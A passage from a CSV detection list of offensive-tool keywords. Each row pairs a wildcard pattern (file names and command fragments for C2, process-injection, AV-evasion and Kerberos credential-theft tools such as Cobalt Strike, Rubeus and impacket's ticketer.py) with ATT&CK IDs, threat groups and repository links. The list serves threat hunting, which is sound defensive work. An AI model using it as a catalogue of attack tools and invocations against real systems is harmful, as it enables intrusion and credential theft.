T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*thisisateststringdontcatchme*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ThisIsNotRat-main*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*thoth.py -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*thoth-master.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Thread_Hiijack_Inject_Load.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*threads all alertable*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
+"*ThreadStackSpoofer*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*ThreatCheck.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck-master*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*threatexpress*","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*threatexpress/cs2modrewrite*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*ThunderDNS*.php*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS*.ps1*","offensive_tool_keyword","ThunderDNS","This 
tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS*.py*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS.git*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ThunderShell*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell.git*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell.py*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell-master.zip*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*tiagorlampert*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ticket.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ticketConverter.py *.ccache *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*ticketer.py -nthash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*ticketsplease adfs *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease azure *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease dcsync *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease ldap *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease saml *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease ticket --domain*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*ticketsplease.modules.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*TicketToHashcat.py*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z"
+"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*tijme/kernel-mii*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z"
+"*TikiLoader*Hollower*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiLoader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
